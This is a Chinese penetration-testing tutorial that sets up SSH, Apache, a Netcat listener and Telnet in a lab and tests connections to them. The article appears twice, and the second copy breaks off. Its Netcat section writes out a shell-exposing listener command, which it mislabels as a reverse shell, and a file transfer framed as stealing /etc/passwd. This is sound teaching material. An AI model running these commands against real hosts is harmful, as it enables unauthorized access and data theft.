1. 项目概述从零到一的Linux服务实战自学渗透测试的第24天这个节点很有意思。通常前二十多天你可能已经啃完了网络基础、熟悉了Kali Linux的基本操作甚至用Nmap扫过几个靶机。但到了这个阶段很多人会卡在一个瓶颈工具会用命令会敲但为什么靶机的某个服务就是连不上为什么明明扫描到了端口却无法建立有效的会话问题的根源往往不在于攻击技巧本身而在于对“服务”这个基础概念的理解和实操能力不足。“Linux服务配置与连接测试”这个主题恰恰是捅破这层窗户纸的关键。它不是什么高深的漏洞利用而是渗透测试工程师乃至所有运维、开发人员的“基建”能力。你得先知道一个服务在Linux上是怎么“活”起来的——它如何被安装、配置、启动、监听端口以及最终如何响应外部的连接请求。只有当你自己能亲手搭建并验证一个服务的完整性时你才能真正理解在渗透测试中当你面对一个开放端口比如21/FTP, 22/SSH, 80/HTTP时它背后究竟在运行着什么可能存在怎样的配置错误Misconfiguration而这正是安全漏洞的温床。今天我们就抛开靶机用自己的双手在一台干净的Linux虚拟机比如Ubuntu或CentOS上从零开始配置几个渗透测试中最常遇到的服务并完成严格的连接测试。这个过程会让你对“端口开放-服务响应-协议交互”这个链条有肌肉记忆般的理解。无论是后续搭建自己的漏洞实验环境还是分析目标系统这种能力都至关重要。2. 实验环境规划与核心思路在开始动手之前清晰的规划能避免后续的混乱。我们不是简单地安装几个软件包而是要模拟一个真实的、可供测试的微型网络环境。2.1 环境与工具选型我选择在本地使用VirtualBox搭建实验环境这是最可控且免费的方式。你完全可以使用VMware Workstation Player或其他虚拟化平台。攻击机AttackerKali Linux 2024.x。这是我们发起测试的主机。选择Kali是因为它集成了我们需要的所有测试工具Nmap, Netcat, Telnet, Curl等。确保其网络模式设置为“NAT网络”或与靶机同在一个“内部网络”中以实现双向通信。靶机TargetUbuntu Server 22.04 LTS。选择它是因为其广泛的社区支持和稳定的包管理系统。我们将在这台机器上配置各种服务。同样将其网络模式设置为与Kali攻击机相同。注意强烈建议为靶机创建一个纯净的快照Snapshot。每成功配置完一个服务并测试后就回滚到这个干净状态再开始下一个服务的配置。这能保证每个实验的独立性避免服务之间的端口冲突或配置残留影响判断。核心服务选择我们挑选渗透测试信息收集阶段最常见的几个服务它们涵盖了不同的协议和配置复杂度SSH (端口22)加密的远程管理协议。配置它来理解密钥认证与密码认证的区别。HTTP Apache (端口80)最基础的Web服务。配置一个简单的页面用于理解Web服务器如何响应请求。Netcat 监听服务 (自定义端口如4444)这不是一个传统“服务”但它是渗透测试中建立反向Shell、文件传输的“瑞士军刀”。手动配置它能让你深刻理解套接字Socket监听的概念。Telnet (端口23)一个明文传输的古老远程登录协议。由于其不安全现代系统通常不默认安装。我们特意安装并配置它就是为了在测试中直观地看到明文流量并理解为什么它会被视为不安全。2.2 整体操作流程设计我们的实验将遵循一个严格的循环这个循环本身也是渗透测试中验证服务可用性的标准思路靶机端操作安装Install使用apt-get install安装服务软件。配置Configure编辑服务的配置文件主要设定监听地址、端口、访问控制等关键参数。启动与激活Start Enable启动服务并设置开机自启使配置在重启后依然生效。状态检查Status Check使用systemctl status或netstat命令确认服务是否正在预期端口上运行。攻击机端操作基础连接测试Basic Connectivity使用ping命令检查网络层是否可达。端口发现测试Port Discovery使用nmap扫描靶机确认目标端口是否处于“开放open”状态而不仅仅是“被过滤filtered”。协议交互测试Protocol Interaction使用对应的客户端工具如ssh,curl,telnet,nc尝试与目标服务建立连接并进行基础交互验证服务功能是否正常。防火墙规则验证Firewall Verification如果连接失败需返回靶机检查本地防火墙如ufw或iptables规则是否阻止了访问。这个“配置-检查-测试”的闭环是后续你分析任何未知服务的标准方法论。3. 靶机基础配置与网络验证在安装任何服务之前我们必须确保两台虚拟机之间网络是连通的并且靶机有一个固定的IP地址用于访问。3.1 网络配置与静态IP设置首先登录到你的Ubuntu Server靶机。默认情况下它可能通过DHCP获取IP这在实验中可能导致IP变化造成连接失败。我们为其设置一个静态IP。查看当前网络接口名称ip addr show。通常主网卡叫ens33或eth0。编辑Netplan配置文件Ubuntu 18.04使用Netplansudo nano /etc/netplan/00-installer-config.yaml。将内容修改为类似下面这样根据你的实际网络环境调整network: version: 2 ethernets: ens33: # 你的网卡名 dhcp4: no addresses: [192.168.56.101/24] # 设定静态IP和子网掩码 gateway4: 192.168.56.1 # 网关通常为虚拟网络的主机地址 nameservers: addresses: [8.8.8.8, 114.114.114.114] # DNS服务器应用配置sudo netplan apply。如果报错可以用sudo netplan --debug apply查看详细原因。验证IP再次运行ip addr show ens33确认IP已变为192.168.56.101。3.2 基础工具安装与防火墙初探接下来安装一些后续调试会用到的工具并熟悉Ubuntu的防火墙ufw。sudo apt update sudo apt upgrade -y # 更新系统 sudo apt install net-tools netcat-openbsd telnetd -y # 安装网络工具和telnet服务端 # net-tools 包含 netstat netcat-openbsd 是 nc 命令的一个版本查看防火墙状态sudo ufw status。如果是inactive表示防火墙未启用所有端口默认开放。在生产环境中这是极其危险的但在我们当前的隔离实验环境中为了方便可以先保持关闭状态。如果你希望更贴近真实可以启用它并手动开放端口sudo ufw enable然后针对每个服务开放端口例如sudo ufw allow 22/tcp。现在切换到你的Kali攻击机。首先测试网络连通性ping -c 4 192.168.56.101如果收到回复说明网络层是通的。如果不通请检查两者的虚拟网络设置是否在同一网络如都是“内部网络”且名称相同或者是否都是“NAT网络”。4. SSH服务配置与密钥认证深度解析SSH是渗透测试中最常见的入口点之一也是系统管理员最常用的远程管理工具。理解其配置对于防御和攻击都至关重要。4.1 服务安装与基础配置在Ubuntu靶机上OpenSSH服务器通常已安装。如果没有安装它sudo apt install openssh-server -y。安装后服务会自动启动。检查状态sudo systemctl status ssh。你应该看到active (running)。关键的配置文件位于/etc/ssh/sshd_config。我们来做几个关键修改以增加可测试性和安全性认知sudo nano /etc/ssh/sshd_config找到并修改或确认以下行Port 22 # 默认端口可以修改为其他端口如2222以练习非标端口扫描 PermitRootLogin prohibit-password # 禁止root直接使用密码登录建议改为no更安全 PasswordAuthentication yes # 允许密码认证我们测试时需要它。生产环境应设为no并仅使用密钥。保存退出后重启SSH服务使配置生效sudo systemctl restart ssh。4.2 从攻击机进行连接测试现在从Kali攻击机进行测试。端口扫描确认nmap -sS -p 22 192.168.56.101-sS是TCP SYN扫描半开放扫描相对隐蔽。你应该看到22/tcp open ssh。基础密码认证连接ssh username192.168.56.101将username替换为你在靶机上创建的实际用户名。输入密码你应该能成功登录。这是最基础的测试。密钥对认证配置与测试重点 密码认证易受暴力破解。SSH密钥认证更安全。我们在Kali上生成密钥对ssh-keygen -t rsa -b 4096 # 在Kali上执行一路回车使用默认路径和空密码这会在~/.ssh/目录下生成id_rsa私钥和id_rsa.pub公钥。将公钥复制到靶机的对应用户authorized_keys文件中ssh-copy-id username192.168.56.101再次尝试SSH连接这次将不需要输入密码直接登录。这个过程模拟了攻击者在获取到目标用户私钥后例如通过漏洞下载无需密码即可登录的场景。实操心得ssh-copy-id命令本质上是将你的公钥追加到了靶机用户家目录下的~/.ssh/authorized_keys文件里。你可以手动验证在靶机上cat ~/.ssh/authorized_keys。渗透测试中检查弱权限的authorized_keys文件如全局可写是一个常见的提权点。4.3 服务状态排查与日志查看如果连接失败按以下顺序排查服务是否运行靶机上sudo systemctl status ssh。端口是否监听靶机上sudo netstat -tlnp | grep :22。查看是否有sshd进程在监听22端口并注意监听地址是0.0.0.0所有接口还是127.0.0.1仅本地。防火墙是否阻止靶机上sudo ufw status。如果启用确保规则允许22端口。查看日志靶机上sudo tail -f /var/log/auth.log。尝试从Kali连接观察日志中是否有连接尝试的记录及错误信息。这是诊断SSH问题的黄金位置。5. Apache HTTP服务配置与请求响应分析Web服务是渗透测试的主战场。配置一个简单的Apache服务器能让你理解HTTP协议交互的基本单元。5.1 安装Apache与部署测试页面在Ubuntu靶机上安装Apache2sudo apt install apache2 -y安装后服务会自动启动。访问http://192.168.56.101从Kali的浏览器或命令行你应该能看到Apache的默认欢迎页面。现在我们创建一个自定义的测试页面以更清晰地观察请求和响应sudo nano /var/www/html/test.php输入以下内容?php echo h1Hello, Penetration Tester!/h1; echo pServer IP: . $_SERVER[SERVER_ADDR] . /p; echo pYour IP: . $_SERVER[REMOTE_ADDR] . /p; echo pRequest Method: . $_SERVER[REQUEST_METHOD] . /p; if (!empty($_GET)) { echo preGET Parameters: . print_r($_GET, true) . /pre; } ?这个页面会显示服务器和客户端的IP、请求方法以及任何GET参数。5.2 使用Curl和Netcat进行协议级测试在Kali攻击机上我们不用浏览器而是用更底层的工具来测试这能让你“看到”原始的HTTP协议。使用Curl进行基础GET请求curl http://192.168.56.101/test.php这会返回页面的HTML源码。加上-I选项可以只获取响应头curl -I http://192.168.56.101你将看到HTTP/1.1 200 OK、Server: Apache/2.4.xx等头部信息。状态码200意味着成功。使用Curl传递参数curl http://192.168.56.101/test.php?nameHackerskillpentest观察返回的页面它应该打印出了你传递的GET参数。这模拟了测试SQL注入或XSS时向Web应用传递恶意参数的行为。使用Netcat进行原始HTTP对话核心 这是理解HTTP协议最好的方式。Netcat可以建立TCP连接并手动发送数据。nc 192.168.56.101 80连接建立后命令行光标停在新行手动输入以下HTTP请求输入后按两次回车GET /test.php HTTP/1.1 Host: 192.168.56.101你会立刻收到服务器返回的完整HTTP响应包括头和正文。这完全模拟了浏览器与服务器之间的交互。你可以尝试输入一个错误的请求比如GET /nothing.html HTTP/1.1观察返回的404 Not Found状态码和页面。注意事项在Netcat交互中请求行和头部结束后必须有一个空行按两次回车来告诉服务器“头部结束开始正文”。这是HTTP协议的规定很多新手会忘记这个空行导致请求被挂起。5.3 日志分析与安全关联Apache的访问日志和错误日志是安全分析的重要来源。在靶机上查看sudo tail -f /var/log/apache2/access.log然后在Kali上执行几次上面的curl或nc请求。观察日志中记录的每一行它包含了客户端IP、时间、请求方法、URL、状态码和User-Agent。渗透测试中攻击者的扫描和攻击行为都会留下这些记录。同时查看错误日志/var/log/apache2/error.log这里会记录服务器处理请求时遇到的内部错误有时会泄露路径或配置信息。6. Netcat监听服务理解套接字与反向Shell基础Netcatnc被称为“网络瑞士军刀”它不是一个常驻的“服务”但我们可以用它手动创建一个监听套接字来模拟后门或文件传输服务。这是理解渗透测试中“反弹Shell”原理的基础。6.1 创建简单的TCP监听与连接在Ubuntu靶机上我们打开一个端口等待连接并回显信息nc -lvnp 4444 -e /bin/bash-l监听模式。-v详细输出。-n直接使用IP地址不进行DNS解析。-p 4444指定监听端口。-e /bin/bash当有连接接入时执行/bin/bash并将其输入输出与网络连接绑定。这是一个非常基础的反向Shell监听端。现在在Kali攻击机上连接这个“服务”nc 192.168.56.101 4444连接成功后你在Kali的Netcat终端里输入的任何Linux命令如ls,whoami,pwd都会在靶机上执行并将结果返回到Kali的终端。这就是一个最简单的反向Shell。请仅在实验环境中操作6.2 无-e参数时的文件传输测试许多系统的Netcat版本没有-e参数出于安全考虑。我们可以用它进行更“正经”的测试比如文件传输。在靶机创建监听准备接收文件nc -lvnp 4444 received_file.txt这条命令让靶机在4444端口监听并将接收到的所有数据写入received_file.txt。在Kali上发送文件echo This is a secret file from Attacker. file_to_send.txt nc 192.168.56.101 4444 file_to_send.txt连接建立后Kali的Netcat会将file_to_send.txt的内容发送过去然后连接关闭。在靶机检查cat received_file.txt应该能看到发送的内容。这个过程模拟了攻击者通过Netcat从目标机器窃取数据如/etc/passwd的场景。6.3 连接测试与防火墙规则验证在Kali上先用Nmap扫描靶机的4444端口nmap -p 4444 192.168.56.101。由于我们的Netcat是用户态临时启动的监听Nmap可能会报告其为open但服务识别为unknown。如果连接失败首先检查靶机的Netcat命令是否还在运行按CtrlC会终止它。其次如果靶机防火墙ufw是启用的需要开放4444端口sudo ufw allow 4444/tcp。踩坑记录不同发行版的Netcat可能有多个变种nc,ncat,netcat参数略有不同。nmap项目提供的ncat功能最全。如果遇到参数错误尝试安装ncat或查阅man nc。在渗透测试中了解目标系统可能存在的Netcat版本及其参数是基本功。7. Telnet服务配置与明文协议风险演示Telnet是一个经典的明文协议配置它不是为了使用而是为了直观地展示不加密通信的风险。7.1 安装与配置Telnet服务器在Ubuntu靶机上Telnet服务器默认不安装sudo apt install telnetd -y安装的通常是inetd或xinetd超级守护进程管理的telnetd。检查服务sudo systemctl status inetd # 或 xinetd确保服务是active状态。Telnet默认使用23端口。7.2 连接测试与流量风险观察在Kali攻击机上使用Telnet客户端连接telnet 192.168.56.101连接成功后会提示输入登录用户名和密码。关键步骤来了在输入密码之前我们在Kali上另开一个终端启动Wireshark或使用命令行抓包工具tcpdump监听与靶机通信的网卡如eth0或ens33sudo tcpdump -i eth0 -w telnet.pcap host 192.168.56.101然后回到Telnet会话输入用户名和密码可以是一个测试账户完成登录执行几个简单的命令如ls然后退出。停止tcpdumpCtrlC用Wireshark打开telnet.pcap文件过滤telnet协议。你可以清晰地看到TCP数据包中你输入的每一个字符包括用户名、密码、命令都以明文形式传输。任何能够截获该网络流量的攻击者都可以直接读取你的凭据。7.3 与SSH的加密通信对比为了形成鲜明对比我们重复上述过程但这次用SSH连接。在抓包的同时用SSH登录靶机并执行命令。在Wireshark中查看SSH流量通常是22端口你会发现所有数据都是加密的乱码无法直接读取任何有效信息。这个实验直观地证明了为什么SSH取代了Telnet也说明了渗透测试中嗅探Sniffing明文协议流量是获取敏感信息的重要手段。在内部网络渗透中如果发现存在Telnet、FTP未使用SSL、HTTP未使用HTTPS等服务攻击者可能会尝试进行ARP欺骗等中间人攻击来截获凭据。8. 综合测试、问题排查与安全加固思维完成以上四个服务的独立配置与测试后我们可以进行一个综合测试并系统化地整理问题排查思路。8.1 多服务端口扫描与识别在Kali攻击机上对靶机进行一次全面的端口扫描和服务识别nmap -sV -sC -O -p- 192.168.56.101-sV探测服务版本。-sC使用默认脚本进行更深入的探测。-O尝试识别操作系统。-p-扫描所有65535个端口。扫描完成后你应该能在结果中清晰地看到22/tcp open ssh OpenSSH 8.9p1 ...80/tcp open http Apache httpd 2.4.52 ...23/tcp open telnet Linux telnetd4444/tcp open unknown(我们Netcat监听的那个端口)这份报告就是渗透测试信息收集阶段最重要的成果之一。它告诉你目标开放了哪些门端口每扇门后是什么服务服务类型甚至服务的具体版本服务版本。版本信息至关重要因为你可以据此搜索该版本是否存在已知的公开漏洞Exploit。8.2 连接测试问题排查速查表在实际操作中你可能会遇到各种连接失败的问题。下面是一个系统化的排查清单问题现象可能原因排查步骤靶机端排查步骤攻击机/网络Connection refused服务未运行或未监听在目标IP上1.systemctl status service_name2.netstat -tlnp | grep :port看是否有进程监听以及监听地址是否为0.0.0.01. 确认目标IP正确2. 确认端口号正确No route to host或Request timeout网络不通防火墙完全阻止1.sudo ufw status查看防火墙规则2.ip addr show确认IP配置1.ping target_ip测试连通性2. 检查虚拟网络设置是否在同一网络服务运行Nmap显示filtered网络防火墙如云主机安全组或主机防火墙阻止了探测包1.sudo ufw status numbered查看并调整规则2. 检查是否有其他防火墙如iptables:sudo iptables -L -n -v尝试其他扫描技术如-sNNULL扫描、-sFFIN扫描绕过简单过滤可以连接但认证失败服务配置禁止了某种认证方式凭据错误1. 检查服务配置文件如sshd_config中的PasswordAuthentication2. 查看认证日志如/var/log/auth.logfor SSH1. 确认使用的用户名/密码或密钥正确2. 尝试其他认证方式连接不稳定或随机断开网络问题服务资源耗尽中间有防火墙切断空闲连接1.dmesg查看系统日志有无异常2.journalctl -u service_name查看服务日志1. 使用ping -f进行洪水Ping测试谨慎使用2. 在连接命令中增加保活参数如SSH的ServerAliveInterval8.3 从配置到安全渗透测试思维延伸完成这些基础配置和测试后你的视角应该从“如何连上”转变为“这里有什么问题”。这就是渗透测试的初级思维默认凭据我们安装的Apache、SSH都是默认配置。现实中很多设备和服务使用出厂默认密码如admin/admin。你的第一项测试就应该是尝试默认凭据。不必要的服务我们特意安装了Telnet它是一个不安全的、不必要的服务。在真实评估中发现开放Telnet、rpcbind、老的Samba版本等都是需要重点标注的风险点。信息泄露Apache默认页面、SSH的版本号OpenSSH 8.9p1都是信息。通过搜索已知漏洞可能发现攻击路径。例如某个特定版本的OpenSSH可能存在用户名枚举漏洞。配置错误如果我们将Apache的目录配置错误导致/etc/passwd文件被Web访问就构成了一个严重的漏洞。检查服务的配置文件权限和内容是否安全是配置审计的一部分。防火墙规则缺失我们为了方便关闭了防火墙。在真实环境中检查防火墙是否最小化开放端口只开放业务必需的端口是安全评估的关键项。通过这第24天的扎实练习你不再只是扫描工具的被动使用者。当Nmap返回一个open端口时你脑子里能立刻浮现出这个服务从安装、配置、启动到响应的完整链条并能亲手复现它。接下来你可以尝试搭建更复杂的服务如FTP、SMB、数据库或者将这些服务放入一个虚拟网络拓扑中尝试跨网段访问那时你会对路由、网关有更深的理解。渗透测试的学习就是在这样一次次的“搭建-测试-破坏-加固”的循环中不断深化对系统与网络的理解。
Linux服务配置与渗透测试实战:从SSH到Apache的完整连接测试指南
1. 项目概述从零到一的Linux服务实战自学渗透测试的第24天这个节点很有意思。通常前二十多天你可能已经啃完了网络基础、熟悉了Kali Linux的基本操作甚至用Nmap扫过几个靶机。但到了这个阶段很多人会卡在一个瓶颈工具会用命令会敲但为什么靶机的某个服务就是连不上为什么明明扫描到了端口却无法建立有效的会话问题的根源往往不在于攻击技巧本身而在于对“服务”这个基础概念的理解和实操能力不足。“Linux服务配置与连接测试”这个主题恰恰是捅破这层窗户纸的关键。它不是什么高深的漏洞利用而是渗透测试工程师乃至所有运维、开发人员的“基建”能力。你得先知道一个服务在Linux上是怎么“活”起来的——它如何被安装、配置、启动、监听端口以及最终如何响应外部的连接请求。只有当你自己能亲手搭建并验证一个服务的完整性时你才能真正理解在渗透测试中当你面对一个开放端口比如21/FTP, 22/SSH, 80/HTTP时它背后究竟在运行着什么可能存在怎样的配置错误Misconfiguration而这正是安全漏洞的温床。今天我们就抛开靶机用自己的双手在一台干净的Linux虚拟机比如Ubuntu或CentOS上从零开始配置几个渗透测试中最常遇到的服务并完成严格的连接测试。这个过程会让你对“端口开放-服务响应-协议交互”这个链条有肌肉记忆般的理解。无论是后续搭建自己的漏洞实验环境还是分析目标系统这种能力都至关重要。2. 实验环境规划与核心思路在开始动手之前清晰的规划能避免后续的混乱。我们不是简单地安装几个软件包而是要模拟一个真实的、可供测试的微型网络环境。2.1 环境与工具选型我选择在本地使用VirtualBox搭建实验环境这是最可控且免费的方式。你完全可以使用VMware Workstation Player或其他虚拟化平台。攻击机AttackerKali Linux 2024.x。这是我们发起测试的主机。选择Kali是因为它集成了我们需要的所有测试工具Nmap, Netcat, Telnet, Curl等。确保其网络模式设置为“NAT网络”或与靶机同在一个“内部网络”中以实现双向通信。靶机TargetUbuntu Server 22.04 LTS。选择它是因为其广泛的社区支持和稳定的包管理系统。我们将在这台机器上配置各种服务。同样将其网络模式设置为与Kali攻击机相同。注意强烈建议为靶机创建一个纯净的快照Snapshot。每成功配置完一个服务并测试后就回滚到这个干净状态再开始下一个服务的配置。这能保证每个实验的独立性避免服务之间的端口冲突或配置残留影响判断。核心服务选择我们挑选渗透测试信息收集阶段最常见的几个服务它们涵盖了不同的协议和配置复杂度SSH (端口22)加密的远程管理协议。配置它来理解密钥认证与密码认证的区别。HTTP Apache (端口80)最基础的Web服务。配置一个简单的页面用于理解Web服务器如何响应请求。Netcat 监听服务 (自定义端口如4444)这不是一个传统“服务”但它是渗透测试中建立反向Shell、文件传输的“瑞士军刀”。手动配置它能让你深刻理解套接字Socket监听的概念。Telnet (端口23)一个明文传输的古老远程登录协议。由于其不安全现代系统通常不默认安装。我们特意安装并配置它就是为了在测试中直观地看到明文流量并理解为什么它会被视为不安全。2.2 整体操作流程设计我们的实验将遵循一个严格的循环这个循环本身也是渗透测试中验证服务可用性的标准思路靶机端操作安装Install使用apt-get install安装服务软件。配置Configure编辑服务的配置文件主要设定监听地址、端口、访问控制等关键参数。启动与激活Start Enable启动服务并设置开机自启使配置在重启后依然生效。状态检查Status Check使用systemctl status或netstat命令确认服务是否正在预期端口上运行。攻击机端操作基础连接测试Basic Connectivity使用ping命令检查网络层是否可达。端口发现测试Port Discovery使用nmap扫描靶机确认目标端口是否处于“开放open”状态而不仅仅是“被过滤filtered”。协议交互测试Protocol Interaction使用对应的客户端工具如ssh,curl,telnet,nc尝试与目标服务建立连接并进行基础交互验证服务功能是否正常。防火墙规则验证Firewall Verification如果连接失败需返回靶机检查本地防火墙如ufw或iptables规则是否阻止了访问。这个“配置-检查-测试”的闭环是后续你分析任何未知服务的标准方法论。3. 靶机基础配置与网络验证在安装任何服务之前我们必须确保两台虚拟机之间网络是连通的并且靶机有一个固定的IP地址用于访问。3.1 网络配置与静态IP设置首先登录到你的Ubuntu Server靶机。默认情况下它可能通过DHCP获取IP这在实验中可能导致IP变化造成连接失败。我们为其设置一个静态IP。查看当前网络接口名称ip addr show。通常主网卡叫ens33或eth0。编辑Netplan配置文件Ubuntu 18.04使用Netplansudo nano /etc/netplan/00-installer-config.yaml。将内容修改为类似下面这样根据你的实际网络环境调整network: version: 2 ethernets: ens33: # 你的网卡名 dhcp4: no addresses: [192.168.56.101/24] # 设定静态IP和子网掩码 gateway4: 192.168.56.1 # 网关通常为虚拟网络的主机地址 nameservers: addresses: [8.8.8.8, 114.114.114.114] # DNS服务器应用配置sudo netplan apply。如果报错可以用sudo netplan --debug apply查看详细原因。验证IP再次运行ip addr show ens33确认IP已变为192.168.56.101。3.2 基础工具安装与防火墙初探接下来安装一些后续调试会用到的工具并熟悉Ubuntu的防火墙ufw。sudo apt update sudo apt upgrade -y # 更新系统 sudo apt install net-tools netcat-openbsd telnetd -y # 安装网络工具和telnet服务端 # net-tools 包含 netstat netcat-openbsd 是 nc 命令的一个版本查看防火墙状态sudo ufw status。如果是inactive表示防火墙未启用所有端口默认开放。在生产环境中这是极其危险的但在我们当前的隔离实验环境中为了方便可以先保持关闭状态。如果你希望更贴近真实可以启用它并手动开放端口sudo ufw enable然后针对每个服务开放端口例如sudo ufw allow 22/tcp。现在切换到你的Kali攻击机。首先测试网络连通性ping -c 4 192.168.56.101如果收到回复说明网络层是通的。如果不通请检查两者的虚拟网络设置是否在同一网络如都是“内部网络”且名称相同或者是否都是“NAT网络”。4. SSH服务配置与密钥认证深度解析SSH是渗透测试中最常见的入口点之一也是系统管理员最常用的远程管理工具。理解其配置对于防御和攻击都至关重要。4.1 服务安装与基础配置在Ubuntu靶机上OpenSSH服务器通常已安装。如果没有安装它sudo apt install openssh-server -y。安装后服务会自动启动。检查状态sudo systemctl status ssh。你应该看到active (running)。关键的配置文件位于/etc/ssh/sshd_config。我们来做几个关键修改以增加可测试性和安全性认知sudo nano /etc/ssh/sshd_config找到并修改或确认以下行Port 22 # 默认端口可以修改为其他端口如2222以练习非标端口扫描 PermitRootLogin prohibit-password # 禁止root直接使用密码登录建议改为no更安全 PasswordAuthentication yes # 允许密码认证我们测试时需要它。生产环境应设为no并仅使用密钥。保存退出后重启SSH服务使配置生效sudo systemctl restart ssh。4.2 从攻击机进行连接测试现在从Kali攻击机进行测试。端口扫描确认nmap -sS -p 22 192.168.56.101-sS是TCP SYN扫描半开放扫描相对隐蔽。你应该看到22/tcp open ssh。基础密码认证连接ssh username192.168.56.101将username替换为你在靶机上创建的实际用户名。输入密码你应该能成功登录。这是最基础的测试。密钥对认证配置与测试重点 密码认证易受暴力破解。SSH密钥认证更安全。我们在Kali上生成密钥对ssh-keygen -t rsa -b 4096 # 在Kali上执行一路回车使用默认路径和空密码这会在~/.ssh/目录下生成id_rsa私钥和id_rsa.pub公钥。将公钥复制到靶机的对应用户authorized_keys文件中ssh-copy-id username192.168.56.101再次尝试SSH连接这次将不需要输入密码直接登录。这个过程模拟了攻击者在获取到目标用户私钥后例如通过漏洞下载无需密码即可登录的场景。实操心得ssh-copy-id命令本质上是将你的公钥追加到了靶机用户家目录下的~/.ssh/authorized_keys文件里。你可以手动验证在靶机上cat ~/.ssh/authorized_keys。渗透测试中检查弱权限的authorized_keys文件如全局可写是一个常见的提权点。4.3 服务状态排查与日志查看如果连接失败按以下顺序排查服务是否运行靶机上sudo systemctl status ssh。端口是否监听靶机上sudo netstat -tlnp | grep :22。查看是否有sshd进程在监听22端口并注意监听地址是0.0.0.0所有接口还是127.0.0.1仅本地。防火墙是否阻止靶机上sudo ufw status。如果启用确保规则允许22端口。查看日志靶机上sudo tail -f /var/log/auth.log。尝试从Kali连接观察日志中是否有连接尝试的记录及错误信息。这是诊断SSH问题的黄金位置。5. Apache HTTP服务配置与请求响应分析Web服务是渗透测试的主战场。配置一个简单的Apache服务器能让你理解HTTP协议交互的基本单元。5.1 安装Apache与部署测试页面在Ubuntu靶机上安装Apache2sudo apt install apache2 -y安装后服务会自动启动。访问http://192.168.56.101从Kali的浏览器或命令行你应该能看到Apache的默认欢迎页面。现在我们创建一个自定义的测试页面以更清晰地观察请求和响应sudo nano /var/www/html/test.php输入以下内容?php echo h1Hello, Penetration Tester!/h1; echo pServer IP: . $_SERVER[SERVER_ADDR] . /p; echo pYour IP: . $_SERVER[REMOTE_ADDR] . /p; echo pRequest Method: . $_SERVER[REQUEST_METHOD] . /p; if (!empty($_GET)) { echo preGET Parameters: . print_r($_GET, true) . /pre; } ?这个页面会显示服务器和客户端的IP、请求方法以及任何GET参数。5.2 使用Curl和Netcat进行协议级测试在Kali攻击机上我们不用浏览器而是用更底层的工具来测试这能让你“看到”原始的HTTP协议。使用Curl进行基础GET请求curl http://192.168.56.101/test.php这会返回页面的HTML源码。加上-I选项可以只获取响应头curl -I http://192.168.56.101你将看到HTTP/1.1 200 OK、Server: Apache/2.4.xx等头部信息。状态码200意味着成功。使用Curl传递参数curl http://192.168.56.101/test.php?nameHackerskillpentest观察返回的页面它应该打印出了你传递的GET参数。这模拟了测试SQL注入或XSS时向Web应用传递恶意参数的行为。使用Netcat进行原始HTTP对话核心 这是理解HTTP协议最好的方式。Netcat可以建立TCP连接并手动发送数据。nc 192.168.56.101 80连接建立后命令行光标停在新行手动输入以下HTTP请求输入后按两次回车GET /test.php HTTP/1.1 Host: 192.168.56.101你会立刻收到服务器返回的完整HTTP响应包括头和正文。这完全模拟了浏览器与服务器之间的交互。你可以尝试输入一个错误的请求比如GET /nothing.html HTTP/1.1观察返回的404 Not Found状态码和页面。注意事项在Netcat交互中请求行和头部结束后必须有一个空行按两次回车来告诉服务器“头部结束开始正文”。这是HTTP协议的规定很多新手会忘记这个空行导致请求被挂起。5.3 日志分析与安全关联Apache的访问日志和错误日志是安全分析的重要来源。在靶机上查看sudo tail -f /var/log/apache2/access.log然后在Kali上执行几次上面的curl或nc请求。观察日志中记录的每一行它包含了客户端IP、时间、请求方法、URL、状态码和User-Agent。渗透测试中攻击者的扫描和攻击行为都会留下这些记录。同时查看错误日志/var/log/apache2/error.log这里会记录服务器处理请求时遇到的内部错误有时会泄露路径或配置信息。6. Netcat监听服务理解套接字与反向Shell基础Netcatnc被称为“网络瑞士军刀”它不是一个常驻的“服务”但我们可以用它手动创建一个监听套接字来模拟后门或文件传输服务。这是理解渗透测试中“反弹Shell”原理的基础。6.1 创建简单的TCP监听与连接在Ubuntu靶机上我们打开一个端口等待连接并回显信息nc -lvnp 4444 -e /bin/bash-l监听模式。-v详细输出。-n直接使用IP地址不进行DNS解析。-p 4444指定监听端口。-e /bin/bash当有连接接入时执行/bin/bash并将其输入输出与网络连接绑定。这是一个非常基础的反向Shell监听端。现在在Kali攻击机上连接这个“服务”nc 192.168.56.101 4444连接成功后你在Kali的Netcat终端里输入的任何Linux命令如ls,whoami,pwd都会在靶机上执行并将结果返回到Kali的终端。这就是一个最简单的反向Shell。请仅在实验环境中操作6.2 无-e参数时的文件传输测试许多系统的Netcat版本没有-e参数出于安全考虑。我们可以用它进行更“正经”的测试比如文件传输。在靶机创建监听准备接收文件nc -lvnp 4444 received_file.txt这条命令让靶机在4444端口监听并将接收到的所有数据写入received_file.txt。在Kali上发送文件echo This is a secret file from Attacker. file_to_send.txt nc 192.168.56.101 4444 file_to_send.txt连接建立后Kali的Netcat会将file_to_send.txt的内容发送过去然后连接关闭。在靶机检查cat received_file.txt应该能看到发送的内容。这个过程模拟了攻击者通过Netcat从目标机器窃取数据如/etc/passwd的场景。6.3 连接测试与防火墙规则验证在Kali上先用Nmap扫描靶机的4444端口nmap -p 4444 192.168.56.101。由于我们的Netcat是用户态临时启动的监听Nmap可能会报告其为open但服务识别为unknown。如果连接失败首先检查靶机的Netcat命令是否还在运行按CtrlC会终止它。其次如果靶机防火墙ufw是启用的需要开放4444端口sudo ufw allow 4444/tcp。踩坑记录不同发行版的Netcat可能有多个变种nc,ncat,netcat参数略有不同。nmap项目提供的ncat功能最全。如果遇到参数错误尝试安装ncat或查阅man nc。在渗透测试中了解目标系统可能存在的Netcat版本及其参数是基本功。7. Telnet服务配置与明文协议风险演示Telnet是一个经典的明文协议配置它不是为了使用而是为了直观地展示不加密通信的风险。7.1 安装与配置Telnet服务器在Ubuntu靶机上Telnet服务器默认不安装sudo apt install telnetd -y安装的通常是inetd或xinetd超级守护进程管理的telnetd。检查服务sudo systemctl status inetd # 或 xinetd确保服务是active状态。Telnet默认使用23端口。7.2 连接测试与流量风险观察在Kali攻击机上使用Telnet客户端连接telnet 192.168.56.101连接成功后会提示输入登录用户名和密码。关键步骤来了在输入密码之前我们在Kali上另开一个终端启动Wireshark或使用命令行抓包工具tcpdump监听与靶机通信的网卡如eth0或ens33sudo tcpdump -i eth0 -w telnet.pcap host 192.168.56.101然后回到Telnet会话输入用户名和密码可以是一个测试账户完成登录执行几个简单的命令如ls然后退出。停止tcpdumpCtrlC用Wireshark打开telnet.pcap文件过滤telnet协议。你可以清晰地看到TCP数据包中你输入的每一个字符包括用户名、密码、命令都以明文形式传输。任何能够截获该网络流量的攻击者都可以直接读取你的凭据。7.3 